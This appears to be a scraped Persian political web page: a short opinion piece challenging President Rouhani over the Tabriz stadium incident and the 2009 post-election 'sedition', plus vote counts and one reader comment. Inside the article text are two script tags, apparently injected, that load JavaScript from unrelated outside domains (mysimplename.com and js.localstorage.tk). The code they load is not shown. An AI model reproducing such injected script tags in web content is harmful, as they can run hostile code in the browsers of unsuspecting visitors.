نقش سران فتنه در حادثه ورزشگاه تبریز


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>آقای روحانی! آیا عامل دروغگوی ورزشگاه تبریز مستحق تنبیه است اما سران فتنه و کودتای سال ۸۸ و عاملان دروغ بزرگ تقلب، مستحق تنبیه نیستند!؟ شما و رسانه های حامی شما پیگیری مجازات عوامل دروغ تقلب و فتنه سال ۸۸ را کاسبی با فتنه می نامید، آیا ادبیات شما در ورزشگاه تبریز برای برخورد با متهمان دروغ ورزشگاه تبریز، نوعی کاسبی نیست؟ <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
9

- 
1

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)
  • با سلام
    خوب بود که همچنین تیکه صحبت روحانی (به نظرم در جمع مردم زاهدان) را داخل کلیپ می آوردید.
    در آن صحنه هم که شباهت به همین جا دارد در جمع مردم در مورد فتنه یا فتنه گران می گوید یک وقتی یک اتفاقی افتاده ...(خلاصه بی خیال شید).